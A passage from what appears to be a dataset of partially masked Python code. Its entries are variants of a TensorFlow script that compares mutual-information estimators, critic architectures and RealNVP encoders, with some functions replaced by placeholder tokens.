loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = 